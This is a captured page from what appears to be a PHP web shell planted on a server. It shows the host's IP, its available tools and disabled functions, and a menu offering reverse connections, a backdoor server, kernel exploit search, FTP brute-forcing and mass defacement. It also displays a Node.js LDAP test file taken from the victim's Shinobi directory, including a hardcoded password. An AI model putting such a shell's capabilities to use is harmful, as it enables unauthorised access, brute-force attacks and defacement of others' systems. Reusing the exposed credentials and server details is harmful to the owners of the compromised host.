IP Address: 80.252.133.24:443 You: 216.73.216.204
| |||||||||||||||||||
|
| ||||||||||||||||||
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON | |||||||||||||||||||
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, | |||||||||||||||||||
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ] |
|||||||||||||||||||
| |||||||||||||||||||
/ distr/ Shinobi/ test/ - drwxr-xr-x |
Viewing file:
Select action/file-type: // const { authenticate } = require('ldap-authentication') // // async function runTest(){ // try{ // let authenticated = await authenticate({ // ldapOpts: { url: 'ldap://127.0.0.1:389' }, // userDn: 'uid=ubuntu,dc=example,dc=com', // userPassword: 'moeiscool', // userSearchBase: 'dc=example,dc=com', // usernameAttribute: 'uid', // username: 'ubuntu2', // }) // console.log(authenticated) // }catch(err){ // console.log('Login Error') // console.log(err) // } // } // runTest() var LdapAuth = require('ldapauth-fork'); const host = 'ldap://127.0.0.1:389' const username = 'ubuntu2' const password = 'moeiscool' const bindDN = 'uid=ubuntu2,ou=People,dc=example,dc=com' const searchBase = 'ou=People,dc=example,dc=com' const searchFilter = '(uid={{username}})' const ldap = new LdapAuth({ url: host, bindDN: bindDN, bindCredentials: password, searchBase: searchBase, searchFilter: searchFilter, reconnect: true }) ldap.authenticate(username, password, function(err, user) { console.log(err,user) }) |
Command: | |
Quick Commands: | |
Upload: | |
PHP Filesystem: |
<@ Ú |
Search File: | |
Create File: | |
View File: | |
Mass Defacement: |